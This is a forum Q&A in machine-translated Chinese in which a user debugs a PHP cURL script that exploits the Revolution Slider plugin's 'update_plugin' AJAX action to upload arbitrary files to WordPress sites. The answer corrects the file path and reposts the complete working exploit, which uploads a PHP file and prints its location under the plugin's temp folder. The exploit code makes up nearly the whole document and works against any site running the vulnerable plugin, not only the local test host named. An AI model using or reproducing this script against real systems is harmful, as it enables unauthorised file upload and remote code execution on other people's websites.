2015-09-01 40 views
0

我試圖在我的WordPress站點上測試一個漏洞,並使用curl進行測試。Curl_init不工作字符串'無法打開文件'「'(長度= 21)

但似乎捲曲不起作用。

<?php 

// $uploaded file 
$myf = "test.txt"; 

function meroAttack($site, $myf) { 
    $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"; 
    $cookie_file_path = "/"; 
    $site = rtrim($site,'/'); 
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php"); 
    curl_setopt($ch, CURLOPT_USERAGENT, $agent); 
    curl_setopt($ch, CURLOPT_POST, true); 
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: 1024','Expect:')); 
    curl_setopt($ch, CURLOPT_POSTFIELDS, array("update_file" => "@" . realpath($myf), "action" => "revslider_ajax_action", "client_action" => "update_plugin")); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path); 
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
    $result = curl_exec($ch); 
    if($result === FALSE){ 
     var_dump(curl_error($ch)); 
    } 

    if (eregi('Update in progress', $result)) { 
     echo $site . "/wp-content/plugins/revslider/temp/update_extract/" . $myf; 
    } else { 
     echo $site . " : Not Revslider \n\n"; 
    } 
    curl_close($ch); 
} 

    meroAttack("http://test.wordpress.devlocal/", $myf); 

?> 

而且它給我的錯誤我的網頁上進行如下:

字符串 '無法打開文件 「」'(長度= 21)

有什麼時缺失

回答

1

更正了此問題。

的問題是,真實路徑是不正確的:

$myf = "/wamp/www/laravel/laravel/public/test2.php";

終極密碼:

<?php 
ini_set('display_errors',1); 
ini_set('display_startup_errors',1); 
error_reporting(-1); 
// $uploaded file 
$myf = "/wamp/www/laravel/laravel/public/test2.php"; 

function meroAttack($site, $myf) { 

    $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"; 
    $cookie_file_path = "/"; 
    $site = rtrim($site,'/'); 
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php"); 
    curl_setopt($ch, CURLOPT_USERAGENT, $agent); 
    curl_setopt($ch, CURLOPT_POST, true); 
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: 1024','Expect:')); 
    curl_setopt($ch, CURLOPT_POSTFIELDS, array("update_file" => "@" . realpath($myf), "action" => "revslider_ajax_action", "client_action" => "update_plugin")); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path); 
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
    $result = curl_exec($ch); 
    if($result === FALSE){ 
     var_dump(curl_error($ch)); 
     var_dump(curl_errno($ch)); 
    } 

    if (eregi('Update in progress', $result)) { 
     echo $site . "/wp-content/plugins/revslider/temp/update_extract/" . $myf; 
    } else { 
     echo $site . " : Not Revslider \n\n"; 
    } 
    curl_close($ch); 
} 

meroAttack("http://test.wordpress.devlocal/", $myf);